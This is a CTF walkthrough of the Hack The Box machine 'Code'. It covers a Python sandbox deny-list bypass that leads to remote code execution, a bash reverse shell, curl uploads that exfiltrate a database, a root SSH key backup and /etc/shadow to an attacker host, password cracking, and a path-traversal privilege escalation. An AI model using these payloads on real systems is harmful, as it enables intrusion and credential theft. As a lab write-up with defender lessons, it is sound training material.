Code :: 4wayhandshake — CTF Walkthroughs, Tips & Tricks

INTRODUCTION

Code was released as the 11th box in HTB’s Season 7 Vice. True to it’s name, Code is about targeting a company that develops and operates an online code editor for Python. In my opinion, it’s the easiest box of the season. By my count, there were only three steps (and four “tricks”) required to finish this Code. Regardless, I found it to be very enjoyable.

Recon was practically nonexistent. Feel free to do the basics, just for practice, but don’t waste any time on it.

Foothold was a lot of fun. We quickly find out that there is a basic protective mechanism guarding us from abusing the web app too much. By thinking about the web app architecture, we can infer how the author made this mechanism, and bypass it very easily. While it’s not quite the same, a little understading of Jinja2 SSTI payloads may come in handy 😮

The user flag is, oddly, on the first user you gain access to. After the flag, if you’ve read the web app source code, you’ll already know exactly what to look for. Some very easy cracking and credential re-use allow you to pivot to the next user.

The root flag is also very easy. Only one script can be ran with sudo, and this script practially screams at you how to abuse it for privesc. Once you see it, I recommend you enable the verbose log option. The PE vector involves an arbitrary file read, so… interpret that however you want! 😂

Code is the perfect choice if you’re on a limited timeframe and want to practice some web app skills.

title picture

RECON

nmap scans

Port scan

I’ll start by setting up a directory for the box, with an nmap subdirectory. I’ll set $RADDR to the target machine’s IP and scan it with a TCP port scan over all 65535 ports:

sudo nmap -p- -O --min-rate 1000 -oN nmap/port-scan-tcp.txt $RADDR

PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

☝️ That’s probably a Flask server, not UPnP.

Script scan

To investigate a little further, I ran a script scan over the TCP ports I just found:

TCPPORTS=`grep "^[0-9]\+/tcp" nmap/port-scan-tcp.txt | sed 's/^\([0-9]\+\)\/tcp.*/\1/g' | tr '\n' ',' | sed 's/,$//g'`
sudo nmap -sV -sC -n -Pn -p$TCPPORTS -oN nmap/script-scan-tcp.txt $RADDR

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
|   256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_  256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open  http    Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4

Confirmed, we definitely have an HTTP server on port 5000.

UDP scan

To be thorough, I’ll also do a scan over the common UDP ports. UDP scans take quite a bit longer, so I limit it to only common ports:

sudo nmap -sUV -T4 -F --version-intensity 0 -oN nmap/port-scan-udp.txt $RADDR

No important results.

Webserver Strategy

There was no redirect to any domain, but I’ll add code.htb to my /etc/hosts and do banner-grabbing for the web server:

DOMAIN=boxname.htb
echo "$RADDR $DOMAIN" | sudo tee -a /etc/hosts
whatweb --aggression 3 http://$DOMAIN && curl -IL http://$RADDR

whatweb

No new information from that.

(Sub)domain enumeration

Since we only have a single HTTP server listening, and it’s on port 5000, it doesn’t really make sense to scan for alternate vhosts at the domain or subdomain level.

Directory enumeration

I’ll move on to directory enumeration. First, on http://[domain].htb:

I prefer to not run a recursive scan, so that it doesn’t get hung up on enumerating CSS and images.

WLIST=/usr/share/wordlists/dirs-and-files.txt                              
ffuf -w $WLIST:FUZZ -u http://$DOMAIN:5000/FUZZ -t 60 -ic -c -o fuzzing/ffuf-directories-root -of json -timeout 4 -v

directory enumeration

The /codes directory draws some attention. The rest seems like a typical authenticated web app.

Exploring the Website

As indicated by the website title, the target seems to be some kind of online Python tool. Seems pretty likely what I’ll use some kind of SSTI or command injection to gain a foothold.

Undoubtedly, it has some kind of sandboxing applied! I’ll have to try to fingerprint it.

index page

By examining the response from the index page, we can see quite easily that this site is using a library called ace.js - an online code editor:

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script>
    // Load the Ace editor modes and themes
    ace.config.set('basePath', 'https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.12/');
    var editor = ace.edit("editor");
    editor.session.setMode("ace/mode/python");
    editor.setTheme("ace/theme/monokai");

    $.ajaxSetup({
        xhrFields: {
            withCredentials: true
        }
    });

    function runCode() {
        var code = editor.getValue();
        $.post('/run_code', {code: code}, function(data) {
            document.getElementById('output').textContent = data.output;
        });
    }
    // ...

Now, in ZAP, I’ll add the target code.htb (and any of its subdomains) to the Default Context and proceed to “Spider” the website:

sitemap

However, I can already see that the Spider operation didn’t pick up any of the API endpoints used alongside ace.js. Of those, I’ve already seen:

POST /run_code
GET /load_code/<code_id>
POST /save_code

🤔 Note that we’re running Python, which is a server-side language.
As far as I know, there is no way for a browser to run Python. At best, it can be transpiled into javascript. But that would only work for tiny scripts that have no library dependencies or anything.
Ace.js is only a client-side code editor; it sends code in the JSON body of a POST /run_code request. That means that it’s actually Python + Flask, running server-side, that will execute our code.
👉 Why does this matter? Because any sandboxing/protection will be running server-side.

FOOTHOLD

Code Editor

Restricted Keywords

The sample Hello world line runs fine. Can we read a file?

with open('/etc/passwd', 'r') as f:
    print(f.read())

sandbox fingerprinting 1

After trying variations on this, it seems that the open keyword is restricted. In fact, we can’t even print a string with the word “open”:

sandbox fingerprinting 2

However, we can bypass this by breaking the restricted word into pieces: print("op"+"en sesame!") works perfectly fine.

By testing a few other things, I’ve identified these “restricted” keywords:
open, read, write
import, __builtins__

🤔 Since we can’t refer to certain functions as keywords… maybe we can simply refer to them by name? open, import, and __builtins__ are all part of the builtins module, which can be accessed as a dictionary!

⭐ We can access any element (any built-in function) according to its key (a string, in this case), so we can re-use our bypass from earlier. Just break the “restricted keyword” into two words!

Reading Files

Here’s how we can use open without being blocked:

func_name = "op"+"en"
args = ["/etc/passwd", "r"]
f1 = globals().get('__buil'+'tins__').get(func_name)
res = f1(*args)  # res is now a <file_descriptor> object!

Let’s double-check that it actually worked… We can verify this is actually a file descriptor by checking what methods the object has. In Python, you can see the methods of a class by calling dir() on an object of that class, which results in a list.
Go ahead and try it on your own machine!
func_name = "op"+"en"
args = ["/etc/passwd", "r"]
f1 = globals().get('__buil'+'tins__').get(func_name)
f = f1(*args)
for idx, _method in enumerate(dir(f)):
    print(f'[{idx}]: {_method}')
👍 Confirmed! This strategy looks like it’ll work

But now we’re back at the same problem: we need to use read, but it’s one of the “restricted keywords”. Can we find a way to re-use the same bypass as before (breaking the keyword into two words)?

No problem! All we need is getattr. You call getattr on an object, and specify what method you want (as a string) - so we can indeed re-use the same bypass:

func_name = "op"+"en"
args = ["/etc/passwd", "r"]

f1 = globals().get('__buil'+'tins__').get(func_name)
f = f1(*args)
f2 = getattr(f,'re'+'ad')
print(f2())

arb file read

😎 Perfect. Now I can see that the only users with home directories are martin and app-production.

Attempting to read the SSH key for app-production was unsuccessful, but still indicated that the app is running as that user (got a file not found error instead of file permissions error)

Since this is a Flask server, I’d be willing to bet that the source code is in a file called app.py. We should be able to read it by using a relative filepath…

reading source code

👏 Yup, it worked. Perusing through this file, we finally get to know the whole deny-list of “restricted keywords”:

@app.route('/run_code', methods=['POST'])
def  run_code():
    code = request.form['code']
    old_stdout = sys.stdout
    redirected_output = sys.stdout = io.StringIO()
    try:
        for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write', 'subprocess', '__import__', '__builtins__']:
            if keyword in code.lower():
                return jsonify({'output': 'Use of restricted keywords is not allowed.'})
        exec(code)
        output = redirected_output.getvalue()
    except Exception as e:
        output = str(e)
    finally:
        sys.stdout = old_stdout
    return jsonify({'output': output})

RCE

Normally when attempting to gain RCE through python, you need to import some libraries like os, eval, exec or subprocess.

Given the above code in app.py, you might think "os and exec are already imported, nice!", but this isn’t actually true. As soon as python hits that exec command, our code executes in a new context.

Fear not. We’ve already accessed __builtins__, so importing a module is trivial. Below, I’ve also made a reference to os.system and called it rce

o_s_module = globals().get('__buil'+'tins__').get('__imp'+'ort__')('o'+'s')
rce = getattr(o_s_module,'sys'+'tem')
rce('curl http://10.10.14.12:8000/hi')

got RCE

Well that was easy! Let’s push forward and try to turn this into a reverse shell.

USER FLAG

First, start a reverse shell listener:

sudo ufw allow from $RADDR to any port 4444,8000 proto tcp
bash
nc -lvnp 4444

Now let’s throw a simple bash reverse shell at it:

o_s_module = globals().get('__buil'+'tins__').get('__imp'+'ort__')('o'+'s')
rce = getattr(o_s_module,'sys'+'tem')
rce('bash -c "bash -i >& /dev/tcp/10.10.14.12/4444 0>&1"')

revshell success

Unexpectedly, app-production holds the user flag. Read it for some points:

cat /home/app-production/user.txt

USER FLAG

Web app database

We already saw while reading app.py, the Flask app, that there should be an SQLite database somewhere in the same directory. I didn’t see it immediately while I was looking around, so I searched:

find / -name 'database.db' -type f 2>/dev/null
# /home/app-production/app/instance/database.db

Oh, ok. I guess that’s probably a directory that gets set up at runtime? Let’s exfil it:

curl -F 'file=@/home/app-production/app/instance/database.db' http://10.10.14.12:8000

uploaded database

The database is very simple. Found a couple password hashes right away:

db enum

We can crack these now:

vim loot/db.hash  # Paste the two hashes into the file
hashcat -m 0 db.hash /usr/share/wordlists/rockyou.txt --username

❔ Hashcat didn’t like me attempting to crack these without specifying a hash mode. Thankfully, from reading app.py we already know that it uses raw MD5 hashes, which are mode 0

cracked hashes

Great, there’s two confirmed credentials for the web app:

development : development
martin : nafeelswordsmaster

Credential reuse

The only other authenticated service I’ve come across is SSH:

	Service	Username	Password
❌	SSH	app-production	development
✅	SSH	martin	nafeelswordsmaster

SSH as martin

Excellent, now I don’t need to worry about my reverse shell flaking out.

ROOT FLAG

Local enumeration - martin

As usual when I gain authenticated access to an account, I’ll check what I can sudo, with sudo -l:

# (ALL : ALL) NOPASSWD: /usr/bin/backy.sh

🚨 Seems a likely PE vector! Let’s read the script:

#!/bin/bash

if [[ $# -ne 1 ]]; then
    /usr/bin/echo "Usage: $0 <task.json>"
    exit 1
fi

json_file="$1"

if [[ ! -f "$json_file" ]]; then
    /usr/bin/echo "Error: File '$json_file' not found."
    exit 1
fi

allowed_paths=("/var/" "/home/")

updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\\.\\./"; ""))' "$json_file")

/usr/bin/echo "$updated_json" > "$json_file"

directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')

is_allowed_path() {
    local path="$1"
    for allowed_path in "${allowed_paths[@]}"; do
        if [[ "$path" == $allowed_path* ]]; then
            return 0
        fi
    done
    return 1
}

for dir in $directories_to_archive; do
    if ! is_allowed_path "$dir"; then
        /usr/bin/echo "Error: $dir is not allowed. Only directories under /var/ and /home/ are allowed."
        exit 1
    fi
done

/usr/bin/backy "$json_file"

Notably, the only directory in /home/martin is backups, which (thankfully!) has a premade task.json for us.

I’ll upload this file to my HTTP server so I can play with it from my attacker host:

curl -F 'file=@/home/martin/backups/task.json' http://10.10.14.12:8000

Script Analysis

For the most part, the script is quite clear about what it does. The two confusing parts are the lines that invoke jq, so let’s break them down:

updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\\.\\./"; ""))' "$json_file")

☝️ For each entry in directories_to_archive, remove all instances of ../ then store the resulting JSON in a bash variable

Easy! The removal isn’t recursive, so we can bypass this by using ..././ instead of ../

/usr/bin/echo "$updated_json" > "$json_file"

☝️ Overwrite the original JSON file with the copy that’s had all ../ removed `

directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')

☝️ Run the modified directories_to_archive array through jq, effectively removing the commas and delimiting quotation marks then outputting the results line-by-line. Basically, read the array into a format that we can use easily in a Bash loop

Summary

The script’s whole job is to prevent path traversal. All it does is check that the provided backup paths are allowed, then runs the actual Backy tool (available from the author’s Github repo). However, the script causes two slight complications:

Any ../ gets removed from backup paths
The task.json file gets overwritten every time we run backy.sh

Thankfully, these two effects are nothing more than a mere inconvenience:

(1) can be solved (as I mentioned earlier) by using ..././ instead of ../ for any path traversal.

(2) can be solved by creating a new copy of task.json every time we run the script, then running the script on the new copy only.

Bypassing backy.sh

The original task.json file was this:

{
	"destination": "/home/martin/backups/",
    "multiprocessing": true,
    "verbose_log": false,
    "directories_to_archive": ["/home/app-production/app"],
    "exclude": [".*"]
}

First, I’ll apply a path traversal to backup the /root/.ssh directory:

"directories_to_archive": ["/home/app-production/app/..././..././..././root/.ssh"],

I’ll also modify …

destination directory to something less conspicuous, /tmp/.4wayhs/dump.
multiprocessing to false, just in case
verbose_log to true, because extra logs never hurt
exclude to be something I don’t want or need, like .git. I didn’t check the backy source code to see how excludes are handled, and this way I don’t really need to.

The final result is:

{
    "destination": "/tmp/.4wayhs/dump",
    "multiprocessing": false,
    "verbose_log": true,
    "directories_to_archive": [
        "/home/app-production/app/..././..././..././..././root/ssh"
    ],
    "exclude": [
        ".git"
    ]
}

To get around complication (2), I’ll just keep task.json on my attacker host and download a new copy whenever I try running it.

🤦‍♂️ Ahh I always miss the perfect opportunities to use a heredoc! That would have worked quite nicely 🙂

rm -f task.json; curl -O http://10.10.14.12:8000/task.json && sudo /usr/bin/backy.sh /tmp/.4wayhs/task.json

backup successful

# Exfiltrate the dump
cd dump
mv code_home_app-production_app_.._.._.._.._root_.ssh_2025_March.tar.bz2 dump.tar.bz2
curl -F 'file=@dump.tar.bz2' http://10.10.14.12:8000
# Clean up the target
cd ..
rm -rf dump task.json

Now, on my attacker host, I’ll extract the backup using tar:

tar --bzip2 -xf dump.tar.bz2

As I had hoped, there is an SSH private key inside:

got id rsa

chmod 600 id_rsa
ssh -i ./id_rsa root@code.htb

root ssh

It all worked flawlessly 😁

Grab the root flag to finish off the box:

cat /root/root.txt

CLEANUP

Target

I’ll get rid of the spot where I place my tools, /tmp/.Tools:

rm -rf /tmp/.4wayhs

Attacker

There’s also a little cleanup to do on my local / attacker machine. It’s a good idea to get rid of any “loot” and source code I collected that didn’t end up being useful, just to save disk space:

rm loot/database.db

It’s also good policy to get rid of any extraneous firewall rules I may have defined. This one-liner just deletes all the ufw rules:

NUM_RULES=$(($(sudo ufw status numbered | wc -l)-5)); for (( i=0; i<$NUM_RULES; i++ )); do sudo ufw --force delete 1; done; sudo ufw status numbered;

EXTRA CREDIT

Cracking the shadow file

I haven’t cracked a shadow file in quite a while, so I figured I’d do it now. First, as root on the target host, we exfiltrate /etc/passwd and /etc/shadow:

curl -F 'file=@/etc/passwd' http://10.10.14.12:8000
curl -F 'file=@/etc/shadow' http://10.10.14.12:8000

Now I’ll run these through unshadow and attempt to crack using hashcat:

unshadow passwd shadow > unshadowed
hashcat unshadowed /usr/share/wordlists/rockyou.txt

😅 Unfortunately, it’s going to take 1d 17h to finish with rockyou.txt (which we already know has martin’s password) but there is no guarantee that either of the other two passwords will be present in rockyou.txt…

That’s too long to wait! I’ll terminate this now.

Command Injection with Python

Earlier, while gaining a foothold, I glossed over the details for command injection in Python, lumping commands like eval in the same bucket as subprocess. This doesn’t really do it justice, so I wanted to separate the terms I mentioned.

All of the terms I mentioned are for using Python to execute arbitrary code. But what commands can each handle?

OS shell commands: os.system and subprocess are for evaluating commands in the default shell.
Python code: we can send Python code, as a string, to either eval or exec to have it interpreted by Python.

Method	Purpose	Description & Usage	OS-Related Considerations
`os.system`	Execute a shell command	Calls a command via the system shell and returns the command’s exit status. Example: `os.system("ls -l")`	- Runs the command in a new process spawned by the shell. - Executes as the same UID as the Python process. - The call is blocking (the process waits until the command completes). - Minimal flexibility for interacting with input/output streams.
`subprocess`	Execute a shell command with more control	Provides multiple functions (e.g., `subprocess.run`, `subprocess.Popen`, `subprocess.call`, `subprocess.check_output`). Example: `subprocess.run(["ls", "-l"])`	- Spawns a new process for the command, with options to run with or without a shell (`shell=True` or `False`). - Runs as the same UID as the Python process, though you can modify the environment or user context programmatically if needed. - Blocking by default with utilities like `subprocess.run`, but `Popen` can be used for asynchronous behavior. - High flexibility for capturing outputs, error streams, and managing process resources.
`exec`	Execute Python code dynamically	Executes Python code from a string or compiled code object in the current namespace. Example: `exec("print('Hello')")`	- Runs the code within the current Python process without spawning a new process. - Executes with the same privileges and UID as the host process. - It is a blocking call, as the code is executed immediately and completely before moving on. - Not intended for OS shell command execution.
`eval`	Evaluate a Python expression	Evaluates a Python expression (not full statements) and returns the result. Example: `result = eval("2 + 3")`	- Operates within the current Python process, similar to exec, with no new process creation. - Runs using the same context and privileges. It blocks execution until the evaluation is complete. - Limited to expressions and does not handle OS-level tasks.

LESSONS LEARNED

Attacker

👶 Don’t overcomplicate it. When I was finding the command injection during foothold, I spent a little too much time trying to find the perfect tricks for importing os and running the system function. It was all pretty unnecessary! In the end, I could simply import os directly (with the bypass) and run the function by referencing it with getattr.
♻️ “Web” attacks can often be used locally, although they are a little more rare. In this box, we used a path traversal (traditionally a textbook web attack for poorly structured applications) to circumvent the “allowed directories” for backy.

Defender

👤 Isolate the web app. This idea can take many forms. For example, you could place the web app host in a DMZ to isolate it from the rest of the network. It’s also easy to isolate the web app from the rest of the filesystem by using a chroot jail (although the credential re-use would have negated this). You could run the web app and database as containerized microservices to isolate the filesystems, networks, and memory (but again, it’s thwarted by credential re-use).
📦 Use a premade sandbox instead of rolling your own server-side python protection. Several options exist, such as PyPy Sandbox, or RestrictedPython. A simple deny-list, which was the only protection on this web app, will never work perfectly (the very first bypass I tried was successful)
⚓ Practice defense-in-depth. On this box, a web app firewall, pre-parsing the python code, isolating the python environment, and checking for sensitive data exfiltration would have all been highly beneficial.